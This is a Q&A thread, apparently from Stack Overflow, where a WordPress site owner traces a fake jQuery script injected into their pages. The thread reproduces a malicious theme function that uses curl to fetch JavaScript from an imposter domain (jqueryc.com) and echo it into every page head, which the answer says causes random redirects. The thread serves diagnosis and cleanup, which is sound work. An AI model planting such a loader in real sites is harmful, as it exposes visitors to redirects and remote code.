# Jquery"s" Malware Script

Tags: javascript, jquery, malware

My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.

this is the malicious script: http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js

This is the site: (removed now)

I have checked everywhere for it and have not been successful.

Any help would be greatly appreciated.

Thank you.

**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.

Comment: If you don't know where it has been injected, how can you know that you have taken the necessary precautions?

Comment: Furthermore, if you have restored to an earlier version, how can one expect to find the offending script?

Comment: The script is still in the source of the page on line 69. Either it was incorrectly typed, or the source files for the website were compromised. Or (sorry to say) this is an attempt to get SO users redirected to a site from the malicious script.

Comment: @arxanas, it will take 2 to 4 hours to restore the site so there is plenty of time to find the script. The precautions I have taken included general hardening of the site, which I inadvertently forgot to do before going live.

Comment: @TimMedora -Hi Tim, yes I can see it there too. I just can't find where it is coming from. It looks to me like it is in the wordpress library itself. I am beginning to wonder if there is anything I can do to correct it?

Comment: Have you tried `grep "jquerys" *` or an alternative?

Comment: Maybe check the WP theme that you started with? Perhaps the template had it in there. Since there is also a legitimate reference to jquery, other things would work fine.

Comment: @arxanas - sorry, not sure what grep is?

Comment: @TimMedora - I did find this: //Jquery Function
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} in the functions file for my theme, but when I take out the "c" after jquery - I get a nasty 301 permanent redirect on every page?

Comment: Try either commenting the code out complete (for test purposes), or changing the URL to a legit CDN, like: https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js

Comment: You seem to be using Wordpress, so one resource you should definitely check out is http://codex.wordpress.org/FAQ_My_site_was_hacked

Comment: @Pekka  thank Pekka, that is always the first place I start.

Comment: @TimMedora - I took that snippet of code right out of the functions page for the template and it worked. Apparently nothing was using it either. You were a great help! Thank you again.

Comment: No problem...you should check if the template was bad from the start. If so, you probably shouldn't restore a backup (or remove the bad code when you restore). If not, then it probably means that access to your site was compromised and someone or something (like a plugin) added the script reference.

Comment: @TimMedora - yes, it was bad from the get go. Don't know how it took a week to notice. Thank you for the answer posted below. Hopefully it will help others in the future.

Answer (score 8, accepted):

*Writing up all the comments as an answer, as there is good info here to combat an exploit.*

---

### Problem

A script with a URL posing as a jQuery CDN was found in the source of a Wordpress-driven site. It sounds like both jquerys.com and jqueryc.com were being used as imposter domains.

The malicious code is simple; it randomly redirects to another site and sets a cookie to prevent immediate redirection (once a day). Since it is infrequent, it would be possible to never see this while developing the site, or to overlook it.

### Possible Causes

- A mistake typing the URL
- Compromised server
- A malicious theme
- A malicious plugin

### Resolution

Start with: http://codex.wordpress.org/FAQ_My_site_was_hacked

OP found this code inside the theme:

```
// !!! Suspect Code - Do not use for any purpose !!!

//Jquery Function 
if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
        if (function_exists('curl_init')){
        $url="jqueryc.com/jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo $data;
     }
  }

  add_action('wp_head', 'insert_jquery_theme');
}
```

Viewing the source, there are actually two references to jQuery; one legitimate and one not. Removing the aforementioned snippet of code resolves the problem.

It will still be important to determine the origin of the malicious code (e.g. the theme, a plugin, or a compromised server). Backups shouldn't be restored without examining them for the malicious code.

### Related Links

- [a invalid ticket in the jQuery bugtracker](http://bugs.jquery.com/ticket/12113)
- [WordPress support forum](http://wordpress.org/support/topic/couldnt-find-database-jqueryc_db-help)